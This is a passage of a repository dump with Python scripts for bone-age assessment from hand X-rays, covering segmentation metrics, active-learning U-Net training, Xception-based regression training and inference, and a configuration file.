best_threshold\n\ndef threshold_by_f1(true_vessels, generated, masks, flatten=True, f1_score=False):\n vessels_in_mask, generated_in_mask = pixel_values_in_mask(true_vessels, generated, masks)\n precision, recall, thresholds = precision_recall_curve(vessels_in_mask.flatten(), generated_in_mask.flatten(),\n pos_label=1)\n best_f1, best_threshold = best_f1_threshold(precision, recall, thresholds)\n\n pred_vessels_bin = np.zeros(generated.shape)\n pred_vessels_bin[generated >= best_threshold] = 1\n\n if flatten:\n if f1_score:\n return pred_vessels_bin[masks == 1].flatten(), best_f1\n else:\n return pred_vessels_bin[masks == 1].flatten()\n else:\n if f1_score:\n return pred_vessels_bin, best_f1\n else:\n return pred_vessels_bin\n\n\ndef dice_coefficient(true_vessels, pred_vessels, masks):\n thresholded_vessels = threshold_by_f1(true_vessels, pred_vessels, masks, flatten=False)\n\n true_vessels = true_vessels.astype(np.bool)\n thresholded_vessels = thresholded_vessels.astype(np.bool)\n\n intersection = np.count_nonzero(true_vessels & thresholded_vessels)\n\n size1 = np.count_nonzero(true_vessels)\n size2 = np.count_nonzero(thresholded_vessels)\n\n try:\n dc = 2. * intersection / float(size1 + size2)\n except ZeroDivisionError:\n dc = 0.0\n\n return dc\n\"\"\"\n\n\ndef dice_coefficient_in_train(true_vec, pred_vec):\n true_vec = true_vec.astype(np.bool)\n pred_vec = pred_vec.astype(np.bool)\n\n intersection = np.count_nonzero(true_vec & pred_vec)\n\n size1 = np.count_nonzero(true_vec)\n size2 = np.count_nonzero(pred_vec)\n\n try:\n dc = 2. * intersection / float(size1 + size2)\n except ZeroDivisionError:\n dc = 0.0\n\n return dc\n\n\ndef misc_measures_in_train(gts_vec, preds_vec):\n gts_vec = gts_vec.astype(np.bool)\n preds_vec = preds_vec.astype(np.bool)\n\n cm = confusion_matrix(gts_vec, preds_vec)\n acc = 1. * (cm[0, 0] + cm[1, 1]) / np.sum(cm)\n sensitivity = 1. * cm[1, 1] / ((cm[1, 0] + cm[1, 1]) + 1.)\n specificity = 1. * cm[0, 0] / ((cm[0, 1] + cm[0, 0]) + 1.)\n return acc, sensitivity, specificity\n\n\ndef metric_all_value(gts, preds):\n \"\"\"\n metric all value in training step\n :param gts: 4D array\n :param preds: 4D array\n :return:\n \"\"\"\n assert len(preds.shape) == 4\n assert len(gts.shape) == 4\n\n gts = np.squeeze(gts, axis=-1) # TO 3D array: [BATCH_SIZE, SIDE_LENGTH, SIDE_LENGTH]\n preds = np.squeeze(preds, axis=-1) # TO 3D array: [BATCH_SIZE, SIDE_LENGTH, SIDE_LENGTH]\n\n gts_vec = gts.flatten()\n preds_vec = preds.flatten()\n\n binary_preds = threshold_by_otsu(preds, flatten=False)\n binary_preds_vec = binary_preds.flatten()\n\n dice_coeff = dice_coefficient_in_train(preds_vec, binary_preds_vec)\n acc, sensitivity, specificity = misc_measures_in_train(gts_vec, binary_preds_vec)\n\n return binary_preds, dice_coeff, acc, sensitivity, specificity" }, { "alpha_fraction": 0.6263747215270996, "alphanum_fraction": 0.6450313925743103, "avg_line_length": 52.5947380065918, "blob_id": "22ba85b24305204db61ff2b101f1fdcd9c809664", "content_id": "1d90abe155fa8fc2e98ea2565e76e591cb6bb7e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10184, "license_type": "no_license", "max_line_length": 134, "num_lines": 190, "path": "/al_segmentation/step2_interactive_segmentation.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import numpy as np\nimport os\nimport argparse\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport heapq\nimport time\n\nimport utils_data\n\nfrom tqdm import tqdm\nfrom skimage.color import rgb2grey\nfrom skimage import filters\n\nfrom tf_model_discriminator import pixel_discriminator\nfrom tf_model_dense import dense_net\nfrom tf_model_unet import unet\nfrom tf_ops import dice_coef_loss, pixelwise_cross_entropy\n\nfrom utils_metrics import metric_all_value, threshold_by_otsu\nfrom config import *\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--batch_size', type=int, help=\"training batch size\", default=4)\nparser.add_argument('--init_lr', type=float, help=\"initial learning rate\", default=1E-4)\nparser.add_argument('--dice', type=float, help=\"dice coefficient loss ratio\", default=1.0)\nparser.add_argument('--pixel', type=float, help=\"pixelwise cross entropy loss ratio\", default=1.0)\nparser.add_argument('--gpu', type=int, help=\"GPU number\", default=0)\nparser.add_argument('--exp', type=str, help=\"experiment name\", default=\"interactive_segmentation\")\nFLAGS = parser.parse_args()\n\nbatch_size = FLAGS.batch_size\ndice_ratio = FLAGS.dice\npixel_ratio = FLAGS.pixel\ninit_lr = FLAGS.init_lr\ngpu = FLAGS.gpu\n\nexperiment_name = \"{}_dice{}_pixel{}_GPU{}\".format(FLAGS.exp, dice_ratio, pixel_ratio, gpu)\nimg_out_dir = \"{}/segmentation_results\".format(experiment_name)\nmodel_out_dir = \"{}/model\".format(experiment_name)\nmetrics_out_dir = \"{}/metrics\".format(experiment_name)\n\nif not os.path.isdir(img_out_dir):\n os.makedirs(img_out_dir)\nif not os.path.isdir(model_out_dir):\n os.makedirs(model_out_dir)\nif not os.path.isdir(metrics_out_dir):\n os.makedirs(metrics_out_dir)\n\n\nprint \"[x] building models on GPU: {}\".format(gpu)\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"{}\".format(gpu)\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsess = tf.Session(config=config)\n\n# create model 0\nis_train = tf.placeholder(tf.bool)\nlearning_rate = tf.placeholder(tf.float32)\nprint \"[x] building Model 0\"\ntf.set_random_seed(1377)\nx_0 = tf.placeholder(tf.float32, [batch_size, IMAGE_SIZE, IMAGE_SIZE, 1], name=\"x_0\")\ny_0 = tf.placeholder(tf.float32, [batch_size, IMAGE_SIZE, IMAGE_SIZE, 1], name=\"y_0\")\ny_prob0, conv9_feature0 = unet(x_0, is_train, n_filters=32, name=\"u-net_0\")\ndice_coef_loss_0 = dice_coef_loss(y_prob0, y_0)\npixelwise_cross_entropy_0 = pixelwise_cross_entropy(y_prob0, y_0)\nloss_0 = dice_ratio * dice_coef_loss_0 + pixel_ratio * pixelwise_cross_entropy_0\ntrain_op_0 = tf.train.RMSPropOptimizer(learning_rate).minimize(loss_0)\n\nprint \"[x] building Model 1\"\ntf.set_random_seed(7988)\nx_1 = tf.placeholder(tf.float32, [batch_size, IMAGE_SIZE, IMAGE_SIZE, 1], name=\"x_1\")\ny_1 = tf.placeholder(tf.float32, [batch_size, IMAGE_SIZE, IMAGE_SIZE, 1], name=\"y_1\")\ny_prob1, conv9_feature1 = unet(x_1, is_train, n_filters=32, name=\"u-net_1\")\ndice_coef_loss_1 = dice_coef_loss(y_prob1, y_1)\npixelwise_cross_entropy_1 = pixelwise_cross_entropy(y_prob1, y_1)\nloss_1 = dice_ratio * dice_coef_loss_1 + pixel_ratio * pixelwise_cross_entropy_1\ntrain_op_1 = tf.train.RMSPropOptimizer(learning_rate).minimize(loss_1)\n\nsaver = tf.train.Saver()\nsess.run(tf.global_variables_initializer())\n\nprint \"[x] start training\"\nstep = 0\ncurrent_lr = init_lr\nlast_operator = \"a\"\nfor epoch in tqdm(range(N_TRAINING_EPOCH)):\n print \"==================================================\"\n print \"[x] epoch {}, training U-Net ...\".format(epoch)\n print \"[x] epoch {}, loading training data\".format(epoch)\n annotated_ids = utils_data.load_annotated_data_np(data_dir=RSNA_GT_NP_ANNOTATED, return_ids=True)\n print \"[x] load annotated data ...\"\n annotated_x, annotated_y, annotated_ids = utils_data.load_annotated_data_np(data_dir=RSNA_GT_NP_ANNOTATED, return_ids=False)\n print \"[x] load unannotated data ...\"\n unannotated_x, unannotated_ids = utils_data.load_unannotated_data_np(data_dir=RSNA_GT_NP_UNANNOTATED, annotated_ids=annotated_ids)\n print \"[x] loaded annotated data: {}, unannotated data: {}\".format(annotated_x.shape[0], unannotated_x.shape[0])\n if epoch == N_TRAINING_EPOCH/2:\n current_lr = 0.5 * init_lr\n if epoch == int(0.75*N_TRAINING_EPOCH):\n current_lr = 0.5 * init_lr\n\n shuffled_x, shuffled_y, shuffled_indexes = utils_data.shuffle_data(data_x=annotated_x, data_y=annotated_y)\n for mini_batch in range(annotated_x.shape[0]//batch_size):\n batch_x = shuffled_x[mini_batch*batch_size: (mini_batch+1)*batch_size]\n batch_y = shuffled_y[mini_batch*batch_size: (mini_batch+1)*batch_size]\n [batch_loss_0, _] = sess.run([loss_0, train_op_0],\n feed_dict={x_0: batch_x, y_0: batch_y, is_train: True, learning_rate: current_lr})\n [batch_loss_1, _] = sess.run([loss_1, train_op_1],\n feed_dict={x_1: batch_x, y_1: batch_y, is_train: True, learning_rate: current_lr})\n if step % 100 == 0:\n print \"[--] epoch: {}, mini_batch: {}, global step: {}, loss_0: {}, loss_1: {}\". \\\n format(epoch, mini_batch, step, batch_loss_0, batch_loss_1)\n [batch_segmented_0] = sess.run([y_prob0], feed_dict={x_0: batch_x, is_train: False})\n [batch_segmented_1] = sess.run([y_prob1], feed_dict={x_1: batch_x, is_train: False})\n binary_preds_0, dice_coeff_0, acc_0, sensitivity_0, specificity_0 = metric_all_value(batch_y, batch_segmented_0)\n binary_preds_1, dice_coeff_1, acc_1, sensitivity_1, specificity_1 = metric_all_value(batch_y, batch_segmented_1)\n utils_data.save_obj({\"step\": step, \"batch_loss_0\": batch_loss_0, \"batch_loss_1\": batch_loss_1,\n \"dice_coeff_0\": dice_coeff_0, \"acc_0\": acc_0, \"sensitivity_0\": sensitivity_0, \"specificity_0\": specificity_0,\n \"dice_coeff_1\": dice_coeff_1, \"acc_1\": acc_1, \"sensitivity_1\": sensitivity_1, \"specificity_1\": specificity_1},\n name=metrics_out_dir+\"/step_{}_loss.pkl\".format(step))\n\n if step % 500 == 0:\n output_dir = img_out_dir + \"/step_{}\".format(step)\n if not os.path.isdir(output_dir):\n os.makedirs(output_dir)\n for i in range(batch_size):\n data_index = shuffled_indexes[mini_batch*batch_size+i]\n data_id = annotated_ids[data_index]\n plt.imsave(fname=output_dir+\"/{}_padded_ori.png\".format(data_id), arr=np.squeeze(batch_x[i], axis=2), cmap=\"gray\")\n plt.imsave(fname=output_dir+\"/{}_padded_model_0_bin.png\".format(data_id), arr=binary_preds_0[i], cmap=\"gray\")\n plt.imsave(fname=output_dir+\"/{}_padded_model_1_bin.png\".format(data_id), arr=binary_preds_1[i], cmap=\"gray\")\n plt.imsave(fname=output_dir+\"/{}_padded_bin.png\".format(data_id), arr=np.squeeze(batch_y[i], axis=2), cmap=\"gray\")\n step += 1\n\n print \"-------------------Test On Unannotated Data---------------------\"\n output_dir = img_out_dir + \"/epoch_{}\".format(epoch)\n if not os.path.isdir(output_dir):\n os.makedirs(output_dir)\n n_unannotated_data = unannotated_x.shape[0]\n selected_indexes = np.random.permutation(n_unannotated_data)[:batch_size*TEST_NUM]\n selected_data_x = unannotated_x[selected_indexes]\n for mini_batch in range(TEST_NUM):\n batch_x = selected_data_x[mini_batch*batch_size: (mini_batch+1)*batch_size]\n [model_0_prob] = sess.run([y_prob0], feed_dict={x_0: batch_x, is_train: False})\n [model_1_prob] = sess.run([y_prob1], feed_dict={x_1: batch_x, is_train: False})\n for i in range(batch_size):\n image_index = mini_batch*batch_size+i\n plt.imsave(fname=output_dir+\"/{}_ori.png\".format(image_index), arr=np.squeeze(batch_x[i]), cmap=\"gray\")\n plt.imsave(fname=output_dir+\"/{}_model_0.png\".format(image_index), arr=np.squeeze(model_0_prob[i]), cmap=\"gray\")\n plt.imsave(fname=output_dir+\"/{}_model_1.png\".format(image_index), arr=np.squeeze(model_1_prob[i]), cmap=\"gray\")\n plt.imsave(fname=output_dir+\"/{}_model_0_bin.png\".format(image_index),\n arr=threshold_by_otsu(np.squeeze(model_0_prob[i]), flatten=False), cmap=\"gray\")\n plt.imsave(fname=output_dir+\"/{}_model_1_bin.png\".format(image_index),\n arr=threshold_by_otsu(np.squeeze(model_1_prob[i]), flatten=False), cmap=\"gray\")\n\n print \"-------------Interactive Segmentation --------------------------\"\n unannotated_imgs_similarity = []\n # 1. Calculate each images similarity between the two U-Net Models\n print \"[x] inference all unannotated images and calculate uncertainty ...\"\n for mini_batch in range(unannotated_x.shape[0]//batch_size):\n batch_x = unannotated_x[mini_batch*batch_size: (mini_batch+1)*batch_size]\n [feature_0] = sess.run([conv9_feature0], feed_dict={x_0: batch_x, is_train: False})\n [feature_1] = sess.run([conv9_feature1], feed_dict={x_1: batch_x, is_train: False})\n for i in range(batch_size):\n cosine_similarity = utils_data.similarity_cosine(feature_0[i], feature_1[i])\n unannotated_imgs_similarity.append(cosine_similarity)\n\n # 2. Select AL_UNCERTAINTY_NUM patches with lowest cosine similarity (uncertainty to annotate)\n lowest_similaritites = heapq.nsmallest(AL_UNCERTAINTY_NUM, unannotated_imgs_similarity)\n ids_of_lowest_similarity = []\n for l in lowest_similaritites:\n if l < AL_UNCERTAINTY_NUM:\n ids_of_lowest_similarity.append(unannotated_ids[unannotated_imgs_similarity.index(l)])\n\n # 3. Ask oracle annotation\n print \"#Epoch {}######################\".format(epoch)\n print \"Image Ids to be annotated:\"\n print ids_of_lowest_similarity\n\n print \"[x] interactive waiting ...\"\n if last_operator != \"f\":\n operator = raw_input(\">\")\n if operator == \"s\":\n # save_model\n saver.save(sess, model_out_dir+\"/model.ckpt\", global_step=step)\n elif operator == \"f\":\n last_operator = \"f\"\n else:\n saver.save(sess, model_out_dir + \"/model.ckpt\", global_step=step)\n\n" }, { "alpha_fraction": 0.681392252445221, "alphanum_fraction": 0.6934404373168945, "avg_line_length": 31.478260040283203, "blob_id": "78349f9d060df416187393c63b17c950c370a04b", "content_id": "7b46b8e854bd89ece5f6b03d71bd609b93aa5885", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 747, "license_type": "no_license", "max_line_length": 93, "num_lines": 23, "path": "/paced_transfer/step2_static.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import numpy as np\nimport argparse\n\nfrom glob import glob\nfrom utils_data import load_hdf5, load_obj\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--exp', type=str, help=\"experiment name\", default=\"regression\")\nparser.add_argument('--img_size', type=int, help=\"image size\", default=299)\nparser.add_argument('--sex', type=int, help=\"0 for all, 1 for male, 2 for female\", default=0)\nFLAGS = parser.parse_args()\n\nexp_name = FLAGS.exp\nimg_size = FLAGS.img_size\nsex = FLAGS.sex\n\nmetric_out_dir = \"E{}_S{}_IMG_{}/metric\".format(exp_name, sex, img_size)\n\nmetric_files = glob(metric_out_dir+\"/*.*\")\nfor i in range(len(metric_files)):\n metric_file = metric_out_dir + \"/epoch_{}.pkl\".format(i+1)\n obj = load_obj(metric_file)\n print obj\n" }, { "alpha_fraction": 0.63756263256073, "alphanum_fraction": 0.6639409065246582, "avg_line_length": 37.68367385864258, "blob_id": "fd7c2e40166c35a2592a9e289f10e568af5f0f8d", "content_id": "0c5dadd2203deb2fc042c73a34eb37833c396d13", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3791, "license_type": "no_license", "max_line_length": 111, "num_lines": 98, "path": "/vallina_transfer_learning/inference.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import keras\nimport argparse\nimport os\nimport tensorflow as tf\nimport cv2\nimport numpy as np\n\nfrom pprint import pprint\nfrom keras.backend.tensorflow_backend import set_session\nfrom keras.applications.xception import Xception\nfrom keras.applications.inception_resnet_v2 import InceptionResNetV2\nfrom keras.applications.inception_v3 import InceptionV3\nfrom keras.layers import GlobalAveragePooling2D, Dense, Dropout\nfrom keras.models import Model\nfrom keras.models import load_model\nfrom config import *\n\n\ndef build_model(flags, model_file):\n if flags.model_name == \"inception_v3\":\n base_model = InceptionV3(input_shape=(flags.image_size, flags.image_size, 3), include_top=False,\n weights='imagenet')\n elif flags.model_name == \"inception_resnet_v2\":\n base_model = InceptionResNetV2(input_shape=(flags.image_size, flags.image_size, 3), include_top=False,\n weights='imagenet')\n elif flags.model_name == \"xception\":\n base_model = Xception(input_shape=(flags.image_size, flags.image_size, 3), include_top=False,\n weights='imagenet')\n else:\n raise NotImplementedError(\"Not a supported model: {}\".format(flags.model_name))\n\n x = base_model.output\n x = GlobalAveragePooling2D()(x)\n x = Dropout(0.5)(x)\n x = Dense(1024, activation='tanh')(x)\n x = Dropout(0.25)(x)\n x = Dense(1, activation='linear')(x)\n\n model = Model(inputs=base_model.input, outputs=x)\n\n if os.path.isfile(model_file):\n print \"[x] loading model file {}\".format(model_file)\n model.load_weights(model_file)\n\n return model\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--model_name', type=str, help=\"model name: inception_v3 ....\", default=\"inception_v3\")\n parser.add_argument('--exp', type=str, help=\"experiment name\", default=\"ENH\")\n parser.add_argument('--sex', type=int, help=\"1 for male, 2 for female\", default=1)\n parser.add_argument('--image_size', type=int, default=256)\n parser.add_argument('--gpu_id', type=int, default=0)\n parser.add_argument('--inferenced_image', type=str, default=RSNA_TRAIN_DATA+\"/1451.png\")\n FLAGS = parser.parse_args()\n\n pprint(FLAGS)\n\n print \"[x] building models on GPU {}\".format(FLAGS.gpu_id)\n\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"{}\".format(FLAGS.gpu_id)\n\n config = tf.ConfigProto()\n # config.gpu_options.allow_growth = True\n config.gpu_options.per_process_gpu_memory_fraction = 0.95\n set_session(tf.Session(config=config))\n\n output_path = \"E{}_M{}_S{}_I{}\".format(FLAGS.exp, FLAGS.model_name, FLAGS.sex, FLAGS.image_size)\n\n model = build_model(FLAGS, output_path+\"/weights.h5\")\n print \"build model done\"\n\n if FLAGS.model_name == \"inception_v3\":\n from keras.applications.inception_v3 import preprocess_input\n elif FLAGS.model_name == \"inception_resnet_v2\":\n from keras.applications.inception_resnet_v2 import preprocess_input\n elif FLAGS.model_name == \"xception\":\n from keras.applications.xception import preprocess_input\n else:\n raise ValueError(\"Not support {}\".format(FLAGS.model_name))\n\n print \"load image file\"\n img = cv2.imread(FLAGS.inferenced_image, cv2.IMREAD_COLOR)\n img = cv2.resize(img, (FLAGS.image_size, FLAGS.image_size))\n img = preprocess_input(np.array(img, dtype=np.float32))\n print \"image shape = {}\".format(img.shape)\n\n val = model.predict(np.expand_dims(img, 0))\n print \"->{}\".format(np.squeeze(val))\n \"\"\"\n if FLAGS.sex == 1:\n val = val * 84.2863236515 + 135.30367335\n elif FLAGS.sex == 2:\n val = val * 75.8162237968 + 117.880235376\n print \"[xxx]\" + val\n \"\"\"\n" }, { "alpha_fraction": 0.5941014289855957, "alphanum_fraction": 0.6052329540252686, "avg_line_length": 36.72294235229492, "blob_id": "9144d4124b23b25b938dc88589a0b27bf53b1608", "content_id": "3323de5a6f16d8763aca43b1d9bff4211b15cc7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8714, "license_type": "no_license", "max_line_length": 130, "num_lines": 231, "path": "/paced_transfer/step1_ptl_multithread.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import numpy as np\nimport argparse\nimport os\nimport pprint\nimport keras\nimport time\nimport threading\nimport tensorflow as tf\n\nfrom keras.utils import multi_gpu_model\nfrom keras import optimizers\nfrom keras.backend.tensorflow_backend import set_session\nfrom Queue import Queue\nfrom threading import Lock\n\nfrom keras.applications.xception import Xception\nfrom keras.applications.xception import preprocess_input as xception_input\n\n\nfrom keras.layers import Dense, GlobalAveragePooling2D\nfrom keras.models import Model\nfrom tqdm import tqdm\n\nfrom config import *\nfrom utils_training import _set_trainable_layers, _pprint\nfrom utils_data import save_obj\nfrom utils_data import load_sex_ids, load_data\nfrom utils_metric import regression_metric\n\n\ntrain_data_queue = Queue(maxsize=100)\ntest_data_queue = Queue(maxsize=100)\ntrain_lock = Lock()\ntest_lock = Lock()\n\ndef _build_regressor(img_size=299, num_gpu=1, start_layer=-1, model_file=None, learning_rate=1E-4):\n input_shape = (img_size, img_size, 3)\n if start_layer == -1:\n base_model = Xception(input_shape=input_shape, weights=\"imagenet\", include_top=False)\n _set_trainable_layers(base_model, len(base_model.layers))\n else:\n base_model = Xception(input_shape=input_shape, weights=None, include_top=False)\n _set_trainable_layers(base_model, start_layer)\n\n x = base_model.output\n x = GlobalAveragePooling2D()(x)\n predictions = Dense(1, activation=keras.activations.relu)(x)\n model = Model(inputs=base_model.input, outputs=predictions)\n optimizer = optimizers.RMSprop(lr=learning_rate, decay=0.95)\n if num_gpu > 1:\n model = multi_gpu_model(model, num_gpu)\n print \"[x] compile model on %d GPU(s)\" % num_gpu\n\n if model_file!=None:\n model.load_weights(model_file)\n\n model.compile(optimizer=optimizer, loss=\"mean_squared_error\")\n model.summary(print_fn=_pprint)\n return model\n\n\nclass DataLoadingThread(threading.Thread):\n def __init(self):\n threading.Thread.__init__(self)\n\n def set_data(self, queue, is_train):\n self.queue = queue\n self.is_train = is_train\n if is_train:\n global train_data_queue\n else:\n global test_data_queue\n\n def run(self):\n print threading.current_thread()\n while True:\n if self.queue.qsize() < 100 and not self.queue.full():\n if self.is_train:\n batch_x, batch_y = load_data(sex=sex, img_size=img_size, batch_size=batch_size, augment_times=7)\n if DEBUG_MODEL: print \"%s ask lock\" % threading.current_thread()\n train_lock.acquire()\n if DEBUG_MODEL: print \"%s acquire\" % threading.current_thread()\n self.queue.put({\"x\": batch_x, \"y\": batch_y})\n train_lock.release()\n if DEBUG_MODEL: print \"%s release\" % threading.current_thread()\n else:\n batch_x, batch_y = load_data(sex=sex, img_size=img_size, batch_size=batch_size, augment_times=0)\n test_lock.acquire()\n self.queue.put({\"x\": batch_x, \"y\": batch_y})\n test_lock.release()\n\n\ndef train(n_epoch=N_TRAINING_EPOCH, img_size=299, sex=0, batch_size=16, num_gpu=1, start_layer=-1, start_epoch=0, data_thread=10):\n assert start_layer in [-1, XCEPTION_EXIT_START, XCEPTION_MID_START, XCEPTION_ENTRY_START, 0]\n assert sex in [0, 1, 2]\n # model file path\n if start_layer != -1:\n model_file = model_out_dir+\"/model.h5\"\n else:\n model_file = None\n\n # learning rate\n if start_layer == -1:\n learning_rate = 1E-3\n elif start_layer == XCEPTION_EXIT_START:\n learning_rate = 1E-4\n elif start_layer == XCEPTION_MID_START:\n learning_rate = 5E-5\n elif start_layer == XCEPTION_ENTRY_START:\n learning_rate = 1E-5\n else:\n learning_rate = 5E-6\n\n model = _build_regressor(img_size, num_gpu, start_layer, model_file, learning_rate)\n\n best_mae = np.inf\n tolerance = 0\n\n data_ids = load_sex_ids(sex)\n for i in range(data_thread):\n train_data_thread = DataLoadingThread(name=\"training_data_thread_{}\".format(i))\n train_data_thread.set_data(train_data_queue, True)\n train_data_thread.setDaemon(True)\n train_data_thread.start()\n\n test_data_thread = DataLoadingThread(name=\"test_data_thread_{}\".format(i))\n test_data_thread.set_data(test_data_queue, False)\n test_data_thread.setDaemon(True)\n test_data_thread.start()\n\n for epoch in tqdm(range(start_epoch+1, start_epoch + n_epoch+1)):\n print \"[x] epoch {} -------------------------------------------\".format(epoch)\n for mini_batch in range(len(data_ids)//batch_size):\n while train_data_queue.qsize() <= 0:\n time.sleep(1)\n if DEBUG_MODEL: print \"train data queue, qsize = %d \" % train_data_queue.qsize()\n data_dict = train_data_queue.get()\n loss = model.train_on_batch(x=data_dict[\"x\"], y=data_dict[\"y\"])\n if mini_batch % 50 == 0:\n print \"--epoch {}, mini_batch {}, loss {}\".format(epoch, mini_batch, loss)\n\n # test\n print \"[x] test in epoch {}\".format(epoch)\n losses = 0.0\n for mini_batch in range(int(0.2*len(data_ids)//batch_size)):\n while test_data_queue.qsize() <= 0:\n time.sleep(1)\n data_dict = test_data_queue.get()\n loss = model.test_on_batch(data_dict[\"x\"], data_dict[\"y\"])\n losses += loss\n losses = losses/(int(0.3*len(data_ids)//batch_size))\n print \"== epoch {}, test loss {}\".format(epoch, losses)\n\n # test and metric\n print \"[x] predict in epoch {}\".format(epoch)\n y_true = []\n y_pred = []\n for mini_batch in range(int(0.2*len(data_ids)//batch_size)):\n while test_data_queue.qsize() <= 0:\n time.sleep(1)\n data_dict = test_data_queue.get()\n pred_y = model.predict_on_batch(data_dict[\"x\"])\n for i in range(batch_size):\n y_true.append(data_dict[\"y\"][i]*SCALE)\n y_pred.append(pred_y[i]*SCALE)\n\n evs, mae, mse, meae, r2s, ccc = regression_metric(np.array(y_true), np.array(y_pred))\n save_obj({\"evs\": evs, \"mae\": mae, \"mse\": mse, \"meae\": meae, \"r2s\": r2s, \"ccc\": ccc, \"loss\": losses},\n name=metric_out_dir+\"/epoch_{}.pkl\".format(epoch))\n\n if mae < best_mae:\n best_mae = mae\n tolerance = 0\n model.save_weights(model_out_dir + \"/model.h5\")\n else:\n tolerance += 1\n\n print \"[x] epoch {}, evs {}, mae {}, mse {}, meae {}, r2s {}, ccc {}\".format(epoch, evs, mae, mse, meae, r2s, ccc)\n\n if tolerance > TOLERANCE:\n break\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--exp', type=str, help=\"experiment name\", default=\"rm\")\n parser.add_argument('--img_size', type=int, help=\"image size\", default=128)\n parser.add_argument('--gpu_id', type=int, default=0)\n parser.add_argument('--batch_size', type=int, help=\"training batch size\", default=16)\n parser.add_argument('--sex', type=int, help=\"0 for all, 1 for male, 2 for female\", default=1)\n parser.add_argument('--start_layer', type=int, help=\"start_layer\", default=-1)\n parser.add_argument('--data_thread_num', type=int, help=\"data thread num\", default=5)\n FLAGS = parser.parse_args()\n\n pprint.pprint(FLAGS)\n\n exp_name = FLAGS.exp\n num_gpu = 1\n gpu_id = FLAGS.gpu_id\n img_size = FLAGS.img_size\n batch_size = FLAGS.batch_size * num_gpu\n sex = FLAGS.sex\n start_layer = FLAGS.start_layer\n data_thread_num = FLAGS.data_thread_num\n\n print \"[x] building models on GPU {}\".format(gpu_id)\n\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"{}\".format(gpu_id)\n\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n set_session(tf.Session(config=config))\n\n metric_out_dir = \"E{}_S{}_IMG_{}/metric\".format(exp_name, sex, img_size)\n model_out_dir = \"E{}_S{}_IMG_{}/model\".format(exp_name, sex, img_size)\n if not os.path.isdir(metric_out_dir):\n os.makedirs(metric_out_dir)\n if not os.path.isdir(model_out_dir):\n os.makedirs(model_out_dir)\n start_epoch = len(os.listdir(metric_out_dir))\n\n # training\n train(n_epoch=N_TRAINING_EPOCH,\n img_size=img_size,\n sex=sex,\n batch_size=batch_size,\n num_gpu=num_gpu,\n start_layer=start_layer,\n start_epoch=start_epoch,\n data_thread=data_thread_num)\n" }, { "alpha_fraction": 0.6668700575828552, "alphanum_fraction": 0.7175107002258301, "avg_line_length": 28.799999237060547, "blob_id": "76706bd326bc90fdefc5c13781e5b34eb97f469d", "content_id": "33e692142afa7ffd994727be549c6002ce62492e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1639, "license_type": "no_license", "max_line_length": 63, "num_lines": 55, "path": "/al_segmentation/config.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "# RSNA DATA\nRSNA_DATA_DIR = \"../data/boneage-training-dataset/\"\nRSNA_TRAIN_CSV = \"../data/csv/train.csv\"\nRSNA_GT = \"../data/gt/annotated\"\nRSNA_GT_NP_ANNOTATED = \"../data/gt/annotated/np\"\nRSNA_GT_NP_UNANNOTATED = \"../data/gt/unannotated\"\nRSNA_GT_NEW = \"../data/gt/new\"\nRSNA_GT_KEY_POINT = \"../data/gt/key_point_xml\"\n\n# pre processing\nRSNA_SEGMENT_SAVE_DIR = \"../data/segmented_hand_al/\"\nRSNA_SEG_ALL = \"../data/segmented_all\"\nRSNA_SEG_ENHANCE = \"../data/segmented_enhance\"\nTHRESH_RATIO = 0.9\nIMAGE_SIZE = 256\n\n\nRSNA_TF_VGG16_PATH = \"../transfer_features/vgg16/\"\nRSNA_TF_VGG19_PATH = \"../transfer_features/vgg19/\"\nRSNA_TF_INCEPTION_V3_PATH = \"../transfer_features/inceptionv3/\"\nRSNA_TF_INCEPTION_V4_PATH = \"../transfer_features/inceptionv4/\"\nRSNA_TF_RESNET50_PATH = \"../transfer_features/resnet50/\"\nRSNA_TF_XCEPTION_PATH = \"../transfer_features/xception/\"\n\n# model\nDEBUG_MODEL = False\nN_TRAINING_EPOCH = 100\nAL_UNCERTAINTY_NUM = 10\nTEST_NUM = 20\nSCALE = 240.\n\nFINE_TUNE_ALL = \"3\"\n# Finetune - INCEPTION V3\nINCEPTION_V3_INCEPTION_3 = \"0\"\nINCEPTION_V3_INCEPTION_3_START = 40\nINCEPTION_V3_INCEPTION_4 = \"1\"\nINCEPTION_V3_INCEPTION_4_START = 87\nINCEPTION_V3_INCEPTION_5 = \"2\"\nINCEPTION_V3_INCEPTION_5_START = 229\n\n# Finetune - INCEPTION-RES V2\nINCEPTION_RESNET_V2_INCEPTION_A = \"0\"\nINCEPTION_RESNET_V2_INCEPTION_A_START = 40\nINCEPTION_RESNET_V2_INCEPTION_B = \"1\"\nINCEPTION_RESNET_V2_INCEPTION_B_START = 275\nINCEPTION_RESNET_V2_INCEPTION_C = \"2\"\nINCEPTION_RESNET_V2_INCEPTION_C_START = 618\n\n# Finetune Xception\nXCEPTION_ENTRY = \"0\"\nXCEPTION_ENTRY_START = 